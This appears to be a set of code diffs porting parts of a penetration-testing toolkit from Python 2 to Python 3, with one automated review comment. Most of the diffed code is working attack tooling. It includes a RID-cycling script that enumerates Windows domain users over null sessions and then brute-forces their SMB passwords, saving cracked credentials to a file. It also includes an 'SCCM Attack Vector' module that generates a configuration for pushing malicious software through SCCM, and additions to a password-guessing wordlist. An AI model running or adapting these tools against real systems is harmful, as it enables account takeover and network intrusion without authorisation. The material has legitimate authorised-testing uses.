print "[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users."
print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.")
global denied
denied = 1
@ -112,9 +116,11 @@ def sids_to_names(ip, sid, start, stop):
rid_account = line.split(" ", 1)[1]
# will show during an unhandled request
# '00000' are bogus accounts?
# only return accounts ie. (1). Everything else should be a group
# only return accounts ie. (1). Everything else should be a
# group
if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account:
# here we join based on spaces, for example 'Domain Admins' needs to be joined
# here we join based on spaces, for example 'Domain
# Admins' needs to be joined
rid_account = rid_account.replace("(1)", "")
# return the full domain\username
rid_account = rid_account.rstrip()
@ -138,12 +144,12 @@ try:
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
if len(sys.argv) > 5:
userlist = sys.argv[5]
if not os.path.isfile(userlist):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
# check for python pexpect
@ -151,35 +157,38 @@ try:
import pexpect
# if we don't have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
print("[!] Sorry boss, python-pexpect is not installed. You need to install this first.")
sys.exit()
# if userlist is being used versus rid enum, then skip all of this
if not userlist:
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
# call the check_user_lsa function and check to see if we can find base SID guid
print("[*] Attempting lsaquery first...This will enumerate the base domain SID")
# call the check_user_lsa function and check to see if we can find base
# SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid:
print "[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip()
print "[*] Moving on to extract via RID cycling attack.. "
sid = sid.replace(
"WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print("[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip())
print("[*] Moving on to extract via RID cycling attack.. ")
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
else:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
print("[!] Unable to enumerate through lsaquery, trying default account names..")
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print "[!] Failed using account name: %s...Attempting another." % account
print("[!] Failed using account name: %s...Attempting another." % account)
else:
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
break
# if we found one
if sid != False:
@ -192,9 +201,9 @@ try:
# we has no sids :( exiting
if sid == False:
denied = 1
print "[!] Failed to enumerate SIDs, pushing on to another method."
print("[!] Failed to enumerate SIDs, pushing on to another method.")
print "[*] Enumerating user accounts.. This could take a little while."
print("[*] Enumerating user accounts.. This could take a little while.")
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
@ -203,26 +212,27 @@ try:
if os.path.isfile("%s_users.txt" % ip):
# remove old file
os.remove("%s_users.txt" % ip)
filewrite = file("%s_users.txt" % ip, "a")
filewrite = open("%s_users.txt" % ip, "a")
# cycle through rid and enumerate the domain
sid_names = sids_to_names(ip, sid, rid_start, rid_stop)
if sid_names:
for name in sid_names:
# print the sid
print "Account name: " + name
print("Account name: " + name)
# write the file out
filewrite.write(name + "\n")
# close the file
filewrite.close()
if denied == 0:
print "[*] RID_ENUM has finished enumerating user accounts..."
print("[*] RID_ENUM has finished enumerating user accounts...")
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print "[*] Attempting enumdomusers to enumerate users..."
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = file("%s_users.txt" % ip, "a")
print("[*] Attempting enumdomusers to enumerate users...")
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" %
(ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = open("%s_users.txt" % ip, "a")
counter = 0
for line in iter(proc.stdout.readline, ''):
counter = 1
@ -231,7 +241,7 @@ try:
# cycle through
line = line.split("rid:")
line = line[0].replace("user:[", "").replace("]", "")
print line
print(line)
filewrite.write(line + "\n")
else:
denied = 2
@ -245,32 +255,30 @@ try:
denied = 2
if denied == 2:
print "[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers."
print("[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers.")
if denied == 1:
filewrite.close()
print "[*] Finished dumping users, saved to %s_users.txt." % (ip)
print("[*] Finished dumping users, saved to %s_users.txt." % (ip))
# if we specified a password list
if passwords:
# our password file
passfile = file(passwords, "r").readlines()
passfile = open(passwords, "r").readlines()
userfile = ""
# if userlist was specified
if userlist:
# use the userlist specified
userfile = file(userlist, "r").readlines()
userfile = open(userlist, "r").readlines()
# our list of users
else:
userfile = file("%s_users.txt" % ip, "r").readlines()
# write out the files upon success
filewrite = file("%s_success_results.txt" % ip, "a")
userfile = open("%s_users.txt" % ip, "r").readlines()
# cycle through username first
for user in userfile:
filewrite = open("%s_success_results.txt" % ip, "a")
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\")
user_fixed = user.replace("\\", "\\\\").replace("'", "")
# if the user isn't blank
if user:
@ -283,72 +291,106 @@ try:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else: password = user.lower()
except: pass
else:
password = user.lower()
except:
pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else: password = user.lower()
except: pass
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
else:
password = user.lower()
except:
pass
if password != "":
child = pexpect.spawn(
"rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn(
"rpcclient -U '%s' -N %s" % (user_fixed, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED'])
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED', 'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# login failed for this one
if i == 0:
if "\\" in password:
password = password.split("\\")[1]
print "Failed guessing username of %s and password of %s" % (user, password)
print("Failed guessing username of %s and password of %s" % (user, password))
child.kill(0)
# if successful
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
print("[*] Successfully guessed username: %s with password of: %s" % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
success = True
filewrite.close()
child.kill(0)
# if account expired
if i == 2:
print "[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
print("[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is locked out
if i == 3:
print "[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!"
print("[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!")
child.kill(0)
# if account change is needed
if i == 4:
print "[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user,password)
filewrite.write("CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
print("[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user, password))
filewrite.write(
"CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
if i ==8:
print "[!] Unable to connect to the server. Try again or check networking settings."
print "[!] Exiting RIDENUM..."
# if account is disabled
if i == 5:
print("[*] Account is disabled: %s with password of: %s" % (user, password))
filewrite.write(
"ACCOUNT DISABLED: %s PW: %s\n" % (user, password))
success = True
child.kill(0)
if i == 8 or i == 9:
print("[!] Unable to connect to the server. Try again or check networking settings.")
print("[!] Exiting RIDENUM...")
success = False
sys.exit()
# if successful
if i == 9:
print("[*] Successfully guessed username: %s with password of (NOTE IT IS EXPIRED!): %s" % (user, password))
filewrite.write(
"username: %s password: %s (password expired)\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
filewrite.close()
# if we got lucky
if success:
print "[*] We got some accounts, exported results to %s_success_results_txt" % ip
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip
print("[*] We got some accounts, exported results to %s_success_results_txt" % ip)
print("[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip)
# if we weren't successful
else:
print "\n[!] Unable to brute force a user account, sorry boss."
print("\n[!] Unable to brute force a user account, sorry boss.")
# exit out after we are finished
sys.exit()
# except keyboard interrupt
except KeyboardInterrupt:
print "[*] Okay, Okay... Exiting... Thanks for using rid_enum.py"
print("[*] Okay, Okay... Exiting... Thanks for using rid_enum.py")


@ -1,9 +1,10 @@
#!/usr/bin/python
from src.core.setcore import *
print "The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server."
print("The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server.")
sms_server = raw_input("Enter the IP address or hostname of the SMS Server: ")
package_id = raw_input("Enter the Package ID of the package you want to patch: ")
sms_server = input("Enter the IP address or hostname of the SMS Server: ")
package_id = input(
"Enter the Package ID of the package you want to patch: ")
configuration = '''
# configuration file written by Dave DeSimone and Bill Readshaw
@ -32,10 +33,12 @@ Next
''' % (sms_server, package_id)
# write out the file to reports
filewrite = file(setdir + "/reports/sccm_configuration.txt", "w")
filewrite = open(setdir + "/reports/sccm_configuration.txt", "w")
filewrite.write(configuration)
filewrite.close()
print_status("The SCCM configuration script has been successfully created.")
print_status("You need to copy the script to the startup folder of the server.")
print_status("Report has been exported to %s/reports/sccm_configuration.txt" % (definepath))
pause = raw_input("Press " + bcolors.RED + "{return} " + bcolors.ENDC + "to exit this menu.")
print_status(
"Report has been exported to %s/reports/sccm_configuration.txt" % (definepath))
pause = input("Press " + bcolors.RED +
"{return} " + bcolors.ENDC + "to exit this menu.")
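Review bot: The switch from `raw_input()` to `input()` at the `sms_server`, `package_id` and `pause` prompts is unsafe while the unchanged shebang `#!/usr/bin/python` can still resolve to Python 2, where `input()` evaluates the typed text as an expression: a plain hostname becomes a NameError, an empty line at the pause prompt raises SyntaxError, and whatever the operator types is executed rather than stored. If the module has to keep running on both interpreters, a two-line shim placed before the first prompt, `try: input = raw_input` / `except NameError: pass`, keeps the Python 3 behaviour and restores the string-only read on Python 2 (drop it if the setcore star import already provides an equivalent). Separately, the status line now reports the report under `definepath` while the file is written under `setdir` a few lines earlier; unless both names resolve to the same directory the message points at the wrong location. The `open(..., "w")` would also read better as a `with` block so the handle is closed even if the write raises.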


@ -94,7 +94,16 @@ dirt
air
earth
company
company1
company123
company1!
company!
secret
secret!
secret123
secret1212
secret12
secret1!
sqlpass123
Summer2013
Summer2012